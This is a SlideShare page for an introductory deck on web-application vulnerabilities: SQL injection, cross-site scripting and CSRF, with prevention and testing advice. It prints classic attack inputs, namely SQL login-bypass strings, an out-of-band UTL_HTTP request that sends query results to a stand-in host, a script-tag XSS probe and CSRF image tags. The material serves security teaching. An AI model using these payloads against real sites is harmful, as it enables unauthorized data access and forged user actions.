SlideShare a Scribd company logo

Vulnerabilities in Web Applications

Download as PPTX, PDF
Venkat Ramana Reddy Parine
Venkat Ramana Reddy Parine
1 of 32
Vulnerabilities In Web Applications
What is a Vulnerability ? • Vulnerability is a weakness which allows an attacker to reduce a system's information assurance. • It comprises of three elements: 1. Flaw in the System 2. Attacker access to flaw 3. Capability of attacker to exploit flaw • Vulnerability Life Cycle: 1. Vulnerability is discovered 2. Vulnerability is known to vendor 3. Patch is published 4. Patch is installed in affected systems
Prevailing Vulnerabilities in Web Applications: 1. Injection flaws such as SQL, LDAP injection. 2. Broken Authentication and Session Management 3. Cross Site Scripting 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross Site Request Forgery 9. Using components with known Vulnerabilities 10. Invalidated Redirects and Forwards
Agenda • SQL Injection • Cross Site Scripting ( XSS) • Cross Site Request Forgery (CSRF)
SQL Injection What is SQL Injection ? • An SQL Injection is basically inserting or injecting a SQL query via the data input. • Using this Technique malicious users can inject SQL commands into SQL statement, via web page input. • SQL queries written by programmers make use of user supplied data. • Attackers make use of above feature and try to exploit application. What harm does SQL Injection do ? • Read data from database • Execute administrator operations like Delete Tables. • Modify data in database
General Application Behavior
Examples : • SELECT * FROM Users WHERE UserId = 105 or 1=1 As 1=1 is always true, all the rows from table Users will be returned. This happens when proper sanitization is not applied to UserId input field. • SELECT * FROM Users WHERE Username=’$username’ AND Password=’$password’ $username = 1’ or ‘1’ = ‘1 $password = 1’ or ‘1’ = ‘1 Then query becomes, SELECT * FROM Users WHERE Username=’1’ OR ‘1’ = ‘1’ AND Password=’1’ OR ‘1’ = ‘1’
• SELECT * FROM Users WHERE ((Username=’$username’) AND (Password=MD5(‘$password’))) $username = 1’ or ‘1’ = ‘1’))/* $password = foo Then query becomes, SELECT * FROM Users WHERE ((Username=‘1’ or ‘1’=‘1’))/*’) AND (Password=MD5(‘foo’))) All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks: • In band : By injecting SQL code data retrieved is directly displayed in web application page in this type of attack. SELECT * FROM WHERE USERNAME=‘VENKAT’ • Out of Band : Data is retrieved in a different way (Like results are sent in an email to attacker) in this type of attack. UTL_HTTP.REQUEST can be used to send the SQL query results to a remote IP address.
Request for Out of band attack can be like : • http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerse rver.com:80’) • Inferential Or Blind : 1. Data is not retrieved in this type of attack. 2. Requests are submitted and DB server responses are observed to reconstruct query. 3. These kind of Blind attacks are used when the data is not returned by server and a generic error message is displayed.
Prevention of SQL Injection • Assume all user-submitted data is evil and validate everything. • Ensure that application users have the least privileges. • Install patches and updates as soon as possible. • Display Generic error message instead of printing stack trace. • Using Stored procedures and not exposing the sensitive details.
How to test for SQL Injection ? • Analyze the areas where application talks to Database server. • Input data using a data fuzzer or predefined list of data. • Monitor the responses from server. • If application prints stack trace in the error, modify the Query and try again. • If the application returns generic error, look out for error message in page source code. • In case of no information from application use Blind injection attack technique.
Cross Site Scripting • XSS is short form of Cross site scripting • XSS helps attacker to attack users of a site by injecting a script into webpage • Script gets executed when any user visits the page • It does not attack Web application server or Database • It breaks the trust User has for the Web application.
Key players in XSS • Browser • External Sources Browser : 1. Browser receives information from server which can be classified as data and instructions. 2. It displays data as normal plain text. 3. It executed instructions within instruction context. 4. It also executes instructions which are part of data. For example: Consider that delivery instructions for a product are entered as This is a <script>alert(1);</script> Test order.
Default Browser behavior User requests a site Server responds with HTML, CSS, Javascript etc. files Browser displays the content given by site
External Source : • If an Application does not validate user input properly, user input along with malicious script gets into application. • Browser executes the script which is part of input, when it receives the data from server in the form of response. Possible Sources of User input: 1. Browsers receive information from External sources and Server. 2. Form inputs 3. Reviews or Comments 4. Query string parameter values So, improper handling of input data coming from external source is a cause of Cross site scripting.
Sample Scenario: Server User 1 User 2 User 1 posting comment which contains <script> tags User 2 views comments page and Browser executes script User 1 steals User 2 data
What can be done by using Cross site scripting ? • Stealing User cookies • Stealing confidential information • Malicious redirects >>Redirecting to attacker site and asking for login credentials. • Social engineering >>Injecting new HTML code and asking for Personal information, Credit card details etc. • Performing Clipboard Theft
Types of Cross Site Scripting • Persistent XSS : Injected Script into an input field is stored in web server (database, file etc.) and same data is displayed to other users. • Reflected XSS : Injected script is not stored in server, but sent to browser directly for display purpose and browser executes the script on user browser. • DOM XSS : Injected script uses DOM data to display section of webpage and other actions of attacker intention. It does not require server side interaction. Example: document.URL, window.name etc.
Preventing XSS • Filtering data : If user provides <script>alert(1);</script> then after filtering it becomes alert(1); So the browser simply displays the text and will not execute any instruction • Encoding data : 1. If user provides <script>alert(1);</script> then after encoding it becomes &lt;script&gt;alert(1);&lt;/script&gt; 2. When the encoded data is sent to browser, it will be displayed as <script>alert(1);</script> instead of getting executed as script Few other methods are used for Preventing XSS …
How to Test for XSS vulnerability ? 1. Identify all input fields like HTTP parameters, POST data, hidden form field values and predefined radio or selection values. 2. Input specially crafted input data into input fields. 3. Analyze the resulting HTML response and search for input data. 4. Find the characters which are not properly encoded or filtered out. Tools like ZAP can be used for performing Cross Site Scripting testing in our web applications.
Cross Site Request Forgery What is CSRF ? • CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently. • For example, this attack could result in a transfer of funds, changing a password, or purchasing an item in the user's context. • In effect, CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer, form submission etc.) via the target's browser without knowledge of the target user, at least until the unauthorized function has been committed.
Sample Scenario: http://www.gmail.com/deleteAllMessages Session ID • Consider that Gmail relies only on information known to browser. • For an authenticated user, browser will automatically send cookie with subsequent requests. • Request in figure can be generated in three ways: 1. By the user 2. By the user : typing url directly 3. By the user: following external link Victim Site
Why does CSRF usually happen ? • Web browser handling of session information such as cookies and http authentication information. • Attacker possessing knowledge of valid web application URL’s For example: https://www.example.com/myaccount/creditcards • Application relying entirely on information which is known by the browser. • Existence of HTML tags whose presence causes access to the application resources; such as <img> tag For example: <img src=https://www.example.com/deleteProduct width=“0” height=“0” >
How does user involve in CSRF attacks ? • Following the link in an anonymous email or via chat group. Server responds to the request because User session information is automatically sent by browser with the request. • When user follows a link which refers to a page containing following HTML: <html><body> <img src=“http://www.example.com/action” > </body></html>
Facts about CSRF • Customers of a bank in Mexico were attacked with an email with img tag. The link in img tag changed DNS entry for bank in their routers and pointed to a malicious website impersonating the bank. • About 18 million users of EBay ‘s internet auction in Korea lost their personal information. • CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list.
How to Test for CSRF weakness in a web application ? • Consider a URL u=http://www.example.com/action • Build an HTML page which contains a http request referencing URL u. • Make sure user is logged into application. • Induce him into following the link pointing the URL to be tested. • Check if the web server is executing the request.
Preventing CSRF attacks: • Including CSRF tokens for each user session. • Submission of double cookies. • Log out from the sensitive applications when the work is done. • Do not save any login credentials on the browser. • Using secure browser extensions.
Queries ?
REFERENCES : • Owasp Testing Guide https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf • Veracode.com http://www.veracode.com/security/sql-injection • Code Project http://www.codeproject.com/Articles/877794/Preventing-XSS-in-ASP-NET- Made-Easy
Vulnerabilities in Web Applications

Recommended

Injection attacks
Injection attacksInjection attacks
Injection attacksAdamu Muhammad
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Vishrut Sharma
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
ieee
ieeeieee
ieeeRadheshyam Dhakad
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLFn|u - The Open Security Community
 
Study of Web Application Attacks & Their Countermeasures
Study of Web Application Attacks & Their CountermeasuresStudy of Web Application Attacks & Their Countermeasures
Study of Web Application Attacks & Their Countermeasuresidescitation
 

Recommended

Injection attacks
Injection attacksInjection attacks
Injection attacksAdamu Muhammad
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Vishrut Sharma
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
ieee
ieeeieee
ieeeRadheshyam Dhakad
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLFn|u - The Open Security Community
 
Study of Web Application Attacks & Their Countermeasures
Study of Web Application Attacks & Their CountermeasuresStudy of Web Application Attacks & Their Countermeasures
Study of Web Application Attacks & Their Countermeasuresidescitation
 
A10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsA10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsShane Stanley
 
A7 Missing Function Level Access Control
A7 Missing Function Level Access ControlA7 Missing Function Level Access Control
A7 Missing Function Level Access Controlstevil1224
 
Step by step guide for web application security testing
Step by step guide for web application security testingStep by step guide for web application security testing
Step by step guide for web application security testingAvyaan, Web Security Company in India
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityColin English
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
T04505103106
T04505103106T04505103106
T04505103106IJERA Editor
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefoxReza Nurfachmi
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
Security testing
Security testingSecurity testing
Security testingKhizra Sammad
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRFzakieh alizadeh
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
Session3 data-validation-sql injection
Session3 data-validation-sql injectionSession3 data-validation-sql injection
Session3 data-validation-sql injectionzakieh alizadeh
 
Session4-Authentication
Session4-AuthenticationSession4-Authentication
Session4-Authenticationzakieh alizadeh
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Watch How the Giants Fall
Watch How the Giants FallWatch How the Giants Fall
Watch How the Giants Falljtmelton
 
S5-Authorization
S5-AuthorizationS5-Authorization
S5-Authorizationzakieh alizadeh
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET Journal
 
Owasp Top 10-2013
Owasp Top 10-2013Owasp Top 10-2013
Owasp Top 10-2013n|u - The Open Security Community
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.Рома Алексеев
 
Recce
RecceRecce
Reccecharlieround
 

More Related Content

What's hot

A10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsA10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsShane Stanley
 
A7 Missing Function Level Access Control
A7 Missing Function Level Access ControlA7 Missing Function Level Access Control
A7 Missing Function Level Access Controlstevil1224
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityColin English
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
Session3 data-validation-sql injection
Session3 data-validation-sql injectionSession3 data-validation-sql injection
Session3 data-validation-sql injectionzakieh alizadeh
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Watch How the Giants Fall
Watch How the Giants FallWatch How the Giants Fall
Watch How the Giants Falljtmelton
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET Journal
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 

What's hot (20)

A10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and ForwardsA10 - Unvalidated Redirects and Forwards
A10 - Unvalidated Redirects and Forwards
 
A7 Missing Function Level Access Control
A7 Missing Function Level Access ControlA7 Missing Function Level Access Control
A7 Missing Function Level Access Control
 
Step by step guide for web application security testing
Step by step guide for web application security testingStep by step guide for web application security testing
Step by step guide for web application security testing
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
 
T04505103106
T04505103106T04505103106
T04505103106
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefox
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
Security testing
Security testingSecurity testing
Security testing
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Session3 data-validation-sql injection
Session3 data-validation-sql injectionSession3 data-validation-sql injection
Session3 data-validation-sql injection
 
Session4-Authentication
Session4-AuthenticationSession4-Authentication
Session4-Authentication
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Watch How the Giants Fall
Watch How the Giants FallWatch How the Giants Fall
Watch How the Giants Fall
 
S5-Authorization
S5-AuthorizationS5-Authorization
S5-Authorization
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
 
Owasp Top 10-2013
Owasp Top 10-2013Owasp Top 10-2013
Owasp Top 10-2013
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
 

Viewers also liked

Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.Рома Алексеев
 
Master mx 41ª edicion
Master mx 41ª edicionMaster mx 41ª edicion
Master mx 41ª edicionMaster Mx
 
Discipline Models
Discipline ModelsDiscipline Models
Discipline Modelsjkitt5
 
GLOBALISASI DALAM PENDIDIKAN
GLOBALISASI DALAM PENDIDIKANGLOBALISASI DALAM PENDIDIKAN
GLOBALISASI DALAM PENDIDIKANanurekha9982
 
Apps - o que testar e o que não testar
Apps - o que testar e o que não testarApps - o que testar e o que não testar
Apps - o que testar e o que não testargutssc
 
ILUC prevention Strategies for Sustainable Biofuels 20150402_Romania
ILUC prevention Strategies for Sustainable Biofuels 20150402_RomaniaILUC prevention Strategies for Sustainable Biofuels 20150402_Romania
ILUC prevention Strategies for Sustainable Biofuels 20150402_RomaniaIulia Pisca
 
Cloud Computing & Application Planning for Cloud
Cloud Computing & Application Planning for CloudCloud Computing & Application Planning for Cloud
Cloud Computing & Application Planning for CloudAzhar Khan
 
Evaluation task 1
Evaluation task 1Evaluation task 1
Evaluation task 1wfbennett
 
The FestGuru.com Ultimate Guide to TomorrowWorld
The FestGuru.com Ultimate Guide to TomorrowWorldThe FestGuru.com Ultimate Guide to TomorrowWorld
The FestGuru.com Ultimate Guide to TomorrowWorldFest Guru
 
China's Evolving Approach to Foreign Policy and Development The Case of Sudan
China's Evolving Approach to Foreign Policy and Development The Case of SudanChina's Evolving Approach to Foreign Policy and Development The Case of Sudan
China's Evolving Approach to Foreign Policy and Development The Case of SudanGeoffrey Thoma
 
TONGGAK PENDIDIKAN UNESCO
TONGGAK PENDIDIKAN UNESCO TONGGAK PENDIDIKAN UNESCO
TONGGAK PENDIDIKAN UNESCO anurekha9982
 
ZIA 2016 PRESENTATION-OTK
ZIA 2016 PRESENTATION-OTKZIA 2016 PRESENTATION-OTK
ZIA 2016 PRESENTATION-OTKChippy Simumba
 
The+gioi+qua+la+rong+lon
The+gioi+qua+la+rong+lonThe+gioi+qua+la+rong+lon
The+gioi+qua+la+rong+lonanhngoc890
 
Social media explosion fys paper
Social media explosion fys paperSocial media explosion fys paper
Social media explosion fys paperkddickson17
 
TTMA Newsletter 2011
TTMA Newsletter 2011TTMA Newsletter 2011
TTMA Newsletter 2011Natasha Brown
 
CIEP_paper_2016_2A_Demand_web
CIEP_paper_2016_2A_Demand_webCIEP_paper_2016_2A_Demand_web
CIEP_paper_2016_2A_Demand_webIulia Pisca
 

Viewers also liked (20)

Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
Региональная образовательная политика свердл обл. Задание Селюкова Р.В.
 
Recce
RecceRecce
Recce
 
Master mx 41ª edicion
Master mx 41ª edicionMaster mx 41ª edicion
Master mx 41ª edicion
 
BDavis Resume 2015
BDavis Resume 2015BDavis Resume 2015
BDavis Resume 2015
 
Discipline Models
Discipline ModelsDiscipline Models
Discipline Models
 
GLOBALISASI DALAM PENDIDIKAN
GLOBALISASI DALAM PENDIDIKANGLOBALISASI DALAM PENDIDIKAN
GLOBALISASI DALAM PENDIDIKAN
 
Apps - o que testar e o que não testar
Apps - o que testar e o que não testarApps - o que testar e o que não testar
Apps - o que testar e o que não testar
 
ILUC prevention Strategies for Sustainable Biofuels 20150402_Romania
ILUC prevention Strategies for Sustainable Biofuels 20150402_RomaniaILUC prevention Strategies for Sustainable Biofuels 20150402_Romania
ILUC prevention Strategies for Sustainable Biofuels 20150402_Romania
 
Cloud Computing & Application Planning for Cloud
Cloud Computing & Application Planning for CloudCloud Computing & Application Planning for Cloud
Cloud Computing & Application Planning for Cloud
 
24.09.2015
24.09.201524.09.2015
24.09.2015
 
Evaluation task 1
Evaluation task 1Evaluation task 1
Evaluation task 1
 
The FestGuru.com Ultimate Guide to TomorrowWorld
The FestGuru.com Ultimate Guide to TomorrowWorldThe FestGuru.com Ultimate Guide to TomorrowWorld
The FestGuru.com Ultimate Guide to TomorrowWorld
 
China's Evolving Approach to Foreign Policy and Development The Case of Sudan
China's Evolving Approach to Foreign Policy and Development The Case of SudanChina's Evolving Approach to Foreign Policy and Development The Case of Sudan
China's Evolving Approach to Foreign Policy and Development The Case of Sudan
 
TONGGAK PENDIDIKAN UNESCO
TONGGAK PENDIDIKAN UNESCO TONGGAK PENDIDIKAN UNESCO
TONGGAK PENDIDIKAN UNESCO
 
ZIA 2016 PRESENTATION-OTK
ZIA 2016 PRESENTATION-OTKZIA 2016 PRESENTATION-OTK
ZIA 2016 PRESENTATION-OTK
 
The+gioi+qua+la+rong+lon
The+gioi+qua+la+rong+lonThe+gioi+qua+la+rong+lon
The+gioi+qua+la+rong+lon
 
Social media explosion fys paper
Social media explosion fys paperSocial media explosion fys paper
Social media explosion fys paper
 
TTMA Newsletter 2011
TTMA Newsletter 2011TTMA Newsletter 2011
TTMA Newsletter 2011
 
Upcycling
UpcyclingUpcycling
Upcycling
 
CIEP_paper_2016_2A_Demand_web
CIEP_paper_2016_2A_Demand_webCIEP_paper_2016_2A_Demand_web
CIEP_paper_2016_2A_Demand_web
 

Similar to Vulnerabilities in Web Applications

Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01G Prachi
 
OWASP TOP 10 by Team xbios
OWASP TOP 10 by Team xbiosOWASP TOP 10 by Team xbios
OWASP TOP 10 by Team xbiosVi Vek
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfnanangAris1
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Web application security
Web application securityWeb application security
Web application securityAkhil Raj
 
Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016Sumanth Damarla
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application SecurityPrateek Jain
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)Sam Bowne
 
Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Joe Ferguson
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 

Similar to Vulnerabilities in Web Applications (20)

Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 
OWASP TOP 10 by Team xbios
OWASP TOP 10 by Team xbiosOWASP TOP 10 by Team xbios
OWASP TOP 10 by Team xbios
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdf
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Web application security
Web application securityWeb application security
Web application security
 
Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
Web application security
Web application securityWeb application security
Web application security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 2 of 2)
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 

Vulnerabilities in Web Applications

  • 2. What is a Vulnerability ? • Vulnerability is a weakness which allows an attacker to reduce a system's information assurance. • It comprises of three elements: 1. Flaw in the System 2. Attacker access to flaw 3. Capability of attacker to exploit flaw • Vulnerability Life Cycle: 1. Vulnerability is discovered 2. Vulnerability is known to vendor 3. Patch is published 4. Patch is installed in affected systems
  • 3. Prevailing Vulnerabilities in Web Applications: 1. Injection flaws such as SQL, LDAP injection. 2. Broken Authentication and Session Management 3. Cross Site Scripting 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross Site Request Forgery 9. Using components with known Vulnerabilities 10. Invalidated Redirects and Forwards
  • 4. Agenda • SQL Injection • Cross Site Scripting ( XSS) • Cross Site Request Forgery (CSRF)
  • 5. SQL Injection What is SQL Injection ? • An SQL Injection is basically inserting or injecting a SQL query via the data input. • Using this Technique malicious users can inject SQL commands into SQL statement, via web page input. • SQL queries written by programmers make use of user supplied data. • Attackers make use of above feature and try to exploit application. What harm does SQL Injection do ? • Read data from database • Execute administrator operations like Delete Tables. • Modify data in database
  • 7. Examples : • SELECT * FROM Users WHERE UserId = 105 or 1=1 As 1=1 is always true, all the rows from table Users will be returned. This happens when proper sanitization is not applied to UserId input field. • SELECT * FROM Users WHERE Username=’$username’ AND Password=’$password’ $username = 1’ or ‘1’ = ‘1 $password = 1’ or ‘1’ = ‘1 Then query becomes, SELECT * FROM Users WHERE Username=’1’ OR ‘1’ = ‘1’ AND Password=’1’ OR ‘1’ = ‘1’
  • 8. • SELECT * FROM Users WHERE ((Username=’$username’) AND (Password=MD5(‘$password’))) $username = 1’ or ‘1’ = ‘1’))/* $password = foo Then query becomes, SELECT * FROM Users WHERE ((Username=‘1’ or ‘1’=‘1’))/*’) AND (Password=MD5(‘foo’))) All the columns of Users table will be returned on execution of above query
  • 9. Types of SQL Injection attacks: • In band : By injecting SQL code data retrieved is directly displayed in web application page in this type of attack. SELECT * FROM WHERE USERNAME=‘VENKAT’ • Out of Band : Data is retrieved in a different way (Like results are sent in an email to attacker) in this type of attack. UTL_HTTP.REQUEST can be used to send the SQL query results to a remote IP address.
  • 10. Request for Out of band attack can be like : • http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerse rver.com:80’) • Inferential Or Blind : 1. Data is not retrieved in this type of attack. 2. Requests are submitted and DB server responses are observed to reconstruct query. 3. These kind of Blind attacks are used when the data is not returned by server and a generic error message is displayed.
  • 11. Prevention of SQL Injection • Assume all user-submitted data is evil and validate everything. • Ensure that application users have the least privileges. • Install patches and updates as soon as possible. • Display Generic error message instead of printing stack trace. • Using Stored procedures and not exposing the sensitive details.
  • 12. How to test for SQL Injection ? • Analyze the areas where application talks to Database server. • Input data using a data fuzzer or predefined list of data. • Monitor the responses from server. • If application prints stack trace in the error, modify the Query and try again. • If the application returns generic error, look out for error message in page source code. • In case of no information from application use Blind injection attack technique.
  • 13.
  • 14. Cross Site Scripting • XSS is short form of Cross site scripting • XSS helps attacker to attack users of a site by injecting a script into webpage • Script gets executed when any user visits the page • It does not attack Web application server or Database • It breaks the trust User has for the Web application.
  • 15. Key players in XSS • Browser • External Sources Browser : 1. Browser receives information from server which can be classified as data and instructions. 2. It displays data as normal plain text. 3. It executed instructions within instruction context. 4. It also executes instructions which are part of data. For example: Consider that delivery instructions for a product are entered as This is a <script>alert(1);</script> Test order.
  • 16. Default Browser behavior User requests a site Server responds with HTML, CSS, Javascript etc. files Browser displays the content given by site
